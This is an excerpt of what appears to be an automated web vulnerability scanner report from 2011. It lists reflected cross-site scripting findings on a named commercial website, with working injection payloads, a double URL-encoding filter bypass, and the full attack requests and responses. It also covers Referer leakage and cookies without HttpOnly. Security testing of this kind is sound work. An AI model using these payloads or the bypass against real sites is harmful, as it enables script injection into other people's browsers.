HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gtu5y445d4j1giqdn4l3bg55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d was submitted in the REST URL parameter 3. This input was echoed as bd314"style="x:expression(alert(1))"9639797b41d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/bd314%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229639797b41d HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=w11nlueclbe1ry55ysywmpry; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.91. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e581f"style="x:expression(alert(1))"3b6d10c18aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?e581f"style%3d"x%3aexpression(alert(1))"3b6d10c18aa=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:40 GMT; path=/ Set-Cookie: ASP.NET_SessionId=qlfc4j452c3dom55lvonz145; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8809 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.92. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/videos/demo/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 436c4"style="x:expression(alert(1))"7d96edb3e1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /videos/demo/x22?436c4"style%3d"x%3aexpression(alert(1))"7d96edb3e1d=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sxjxsy55v4wrlmeet1lslx45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8809 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e was submitted in the REST URL parameter 1. This input was echoed as 2d4c3"style="x:expression(alert(1))"a464241924e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /x222d4c3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a464241924e HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=xxiaal45scvt05rw0scrir55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8704 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a was submitted in the REST URL parameter 1. This input was echoed as 9bd6e"style="x:expression(alert(1))"b4a37af963a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /9bd6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522b4a37af963a HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:52 GMT; path=/ Set-Cookie: ASP.NET_SessionId=s4s50qr0kvr4fhux3xpku555; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8683 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.95. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73ce3"style="x:expression(alert(1))"57e4b8b7737 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?73ce3"style%3d"x%3aexpression(alert(1))"57e4b8b7737=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:42 GMT; path=/ Set-Cookie: ASP.NET_SessionId=s4rkbbezripwlcr04310bhix; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8725 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.96. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db50c"style%3d"x%3aexpression(alert(1))"751e53b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db50c"style="x:expression(alert(1))"751e53b85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /x22?db50c"style%3d"x%3aexpression(alert(1))"751e53b85e=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:39 GMT Content-Length: 8718 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: ASP.NET_SessionId=f0nhyr451wf2n5ul5fkcv5fi; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /specials/smartdraw.asp?id=104640/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/sd/buy-sd.htm HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/smartdraw.asp HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close